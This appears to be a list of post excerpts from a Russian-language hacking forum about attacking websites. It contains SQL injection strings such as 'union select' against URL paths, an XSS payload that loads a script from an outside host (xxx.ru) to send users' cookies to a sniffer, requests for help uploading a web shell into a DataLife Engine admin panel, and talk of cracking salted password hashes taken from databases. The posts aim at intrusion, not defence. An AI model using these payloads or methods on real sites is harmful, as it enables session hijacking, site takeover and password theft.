Separate names with a comma.
Имеется инъекция типа http://site/cat/'SQL где видимо применен mod_rewrite запрос типа http://site/cat/' union select 1,2,3,4 прекрасно...
Это вроде как только последней версии (Леопард) касается
if (isset($_GET["direction"])) { $direction = $_GET["direction"]; } if (isset($_GET["page"])) { $page = $_GET["page"]; }...
Копаясь в одном движке нашел такую инъекцию: SELECT * FROM table WHERE 1 order by [SQL] Т.к. union в данном случае не применить то я попытался...
Ссылку ядовитую надо ему подсунуть где в урле чето типа того "><script scr=http://xxx.ru/script.js></script> где script.js шлет куки на снифер
Здесь набросал небольшой мануал. Если есть дополнения или улучшения пишите в личку
Часто бывает так: шелл залили, доступ к БД получили, а хотелось бы получить пароли пользователей. Но вот беда пароли зашифрованные, да еще...
Через че вообще пытаться залить? Через рисунки не получается.
Подскажите плиз как залить шелл в админке Datalife версия 6.7
Когда я пытался сделать тоже самое не уровне бд получалось то же самое, ява не виновата, походу это что-то связанное с сессиями/куками
Давно хотел спросить, от чего такое происходит. Разве скрипту они присылаются в таком виде?
Хеш то соленый, тем более что в smf шифруется не md5() а sha(), а для него таких обьемных баз нету
Никакая эта не уязвимость, просто закачка идет через Dht. Кто мешает отключить его в клиенте? Тогда все ваши старания идут лесом
Такая же фишка для IPB описана здесь и тут
А можно поподробнее, а то у меня с явой никак
